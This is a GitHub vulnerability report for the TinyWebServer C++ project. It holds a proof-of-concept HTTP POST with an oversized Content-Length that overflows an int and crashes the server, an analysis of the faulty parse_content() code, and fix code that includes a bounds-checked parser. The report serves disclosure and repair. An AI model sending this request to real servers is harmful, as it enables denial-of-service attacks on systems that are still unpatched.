qinguoyi / TinyWebServer

:fire: Linux下C++轻量级WebServer服务器
Apache License 2.0

Integer overflow leads to a denial-of-service vulnerability #201

Closed ek1ng closed 1 year ago

ek1ng commented 1 year ago

POC

Send the following HTTP request to the server:

POST / HTTP/1.1
Host: 127.0.0.1:9006
User-Agent: curl/7.68.0
Accept: */*
Content-Length:0221202434513

................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

The process crashes.

[screenshot: image-20230228151641295]

Vulnerability analysis

http_conn.h

int m_content_length;

Here m_content_length is declared as an int.

http_conn.cpp

m_content_length = atol(text);

When the value in the Content-Length request header is large, m_content_length is read in as a long and then converted to an int. For example, 0221202434513 from the payload above is 0x3380b149d1 in hexadecimal; after conversion to int it is truncated to its low 8 hex digits, 0x80b149d1, which is a negative number.

http_conn.cpp

http_conn::HTTP_CODE http_conn::parse_content(char *text)
{
    // with a negative m_content_length the right-hand side is small,
    // so this test passes no matter how little of the body has arrived
    if (m_read_idx >= (m_content_length + m_checked_idx))
    {
        // negative index: the terminator is written far outside the buffer
        text[m_content_length] = '\0';
        // the end of the POST body carries the submitted username and password
        m_string = text;
        return GET_REQUEST;
    }
    return NO_REQUEST;
}

text[m_content_length] = '\0'; m_content_length is a fairly large negative number, beyond the size of the heap area, and when an address without access permission is reached this causes a crash.

Suggested fix

In http_conn.h, change m_read_idx, m_content_length and m_checked_idx to the long type.
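The following C program is an added example, not code from the TinyWebServer project or from the issue author. It reproduces the narrowing described above (atol() into an int, on a 64-bit Linux build where long is 64 bits), shows why the body-complete check in parse_content() then passes for any request, and places a hardened Content-Length parser and parse_content() replacement next to it. The buffer size READ_BUFFER_SIZE, the struct conn layout, the enum names and the helper names (content_length_as_int, original_check_passes, parse_content_length, parse_content_safe, run_poc, run_normal, run_partial) are assumptions made for this example; the Content-Length value is the one from the PoC.

```c
#include <errno.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>

/* Constructed input: the Content-Length value from the PoC above. */
static const char *const POC_CONTENT_LENGTH = "0221202434513";

/* Assumed read-buffer size for this example; the server's own constant may differ. */
#define READ_BUFFER_SIZE 2048

/* 1. What the original code does: atol() returns a long, and storing it in an
 *    int member keeps only the low 32 bits (gcc/clang on 64-bit Linux). */
int content_length_as_int(const char *text)
{
    long full = atol(text);     /* 221202434513 = 0x3380B149D1 on LP64 */
    int truncated = (int)full;  /* low 32 bits: 0x80B149D1 = -2135864879 */
    return truncated;
}

/* The body-complete test from parse_content(), with the original int types.
 * A negative content length makes the right-hand side smaller than read_idx
 * for any request, so the original goes on to write text[m_content_length]. */
bool original_check_passes(int read_idx, int checked_idx, int content_length)
{
    return read_idx >= (content_length + checked_idx);
}

/* 2. Hardened parsing (added here; not the project's code). Accept only a run
 *    of decimal digits, detect overflow, and cap the value at what the buffer
 *    can hold so the later terminator write stays in bounds. */
bool parse_content_length(const char *text, size_t max_len, size_t *out)
{
    if (text == NULL || *text == '\0')
        return false;
    /* strtoull alone would accept leading spaces, "+" and "-"; the header
       grammar allows digits only, so reject everything else up front. */
    for (const char *p = text; *p != '\0'; ++p)
        if (*p < '0' || *p > '9')
            return false;
    errno = 0;
    char *end = NULL;
    unsigned long long v = strtoull(text, &end, 10);
    if (errno == ERANGE || *end != '\0' || v > max_len)
        return false;
    *out = (size_t)v;
    return true;
}

/* Wrapper returning -1 on rejection, convenient for checks and assertions. */
long parse_or_minus_one(const char *text, size_t max_len)
{
    size_t v;
    return parse_content_length(text, max_len, &v) ? (long)v : -1L;
}

enum http_code { NO_REQUEST, GET_REQUEST, BAD_REQUEST };

struct conn {
    char read_buf[READ_BUFFER_SIZE];
    size_t read_idx;        /* bytes received so far */
    size_t checked_idx;     /* offset where the body starts */
    size_t content_length;
};

/* 3. Safe replacement for parse_content(): unsigned indices, and the length is
 *    validated against the remaining buffer space before any write happens. */
enum http_code parse_content_safe(struct conn *c, const char *content_length_hdr)
{
    if (c->checked_idx >= sizeof c->read_buf)
        return BAD_REQUEST;
    size_t room = sizeof c->read_buf - c->checked_idx - 1;  /* keep space for '\0' */
    if (!parse_content_length(content_length_hdr, room, &c->content_length))
        return BAD_REQUEST;  /* the PoC value ends here instead of as a negative int */
    if (c->read_idx < c->checked_idx + c->content_length)
        return NO_REQUEST;   /* body not fully received yet */
    c->read_buf[c->checked_idx + c->content_length] = '\0';
    return GET_REQUEST;
}

/* The PoC request: 600 bytes received, body starting at offset 100. */
enum http_code run_poc(void)
{
    struct conn c = { .read_idx = 600, .checked_idx = 100 };
    return parse_content_safe(&c, POC_CONTENT_LENGTH);
}

/* A well-formed request whose 13-byte body has fully arrived. */
enum http_code run_normal(void)
{
    struct conn c = { .read_idx = 113, .checked_idx = 100 };
    return parse_content_safe(&c, "13");
}

/* The same request with only 5 of the 13 body bytes received so far. */
enum http_code run_partial(void)
{
    struct conn c = { .read_idx = 105, .checked_idx = 100 };
    return parse_content_safe(&c, "13");
}

int main(void)
{
    int as_int = content_length_as_int(POC_CONTENT_LENGTH);
    printf("Content-Length %s as int: %d\n", POC_CONTENT_LENGTH, as_int);
    printf("original body check passes: %d\n", original_check_passes(600, 100, as_int));
    printf("hardened parse_content on PoC: %d (2 = BAD_REQUEST)\n", run_poc());
    return 0;
}
```

Changing the members to long, as suggested above, removes the truncation on LP64 but still leaves text[m_content_length] unchecked against the buffer size; the parse_content_safe() version above bounds the length by the space actually left in read_buf, which is the check that stops both this PoC and any merely oversized Content-Length.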

zhangm365 commented 1 year ago

Does this happen in the scenario where the request body is too long?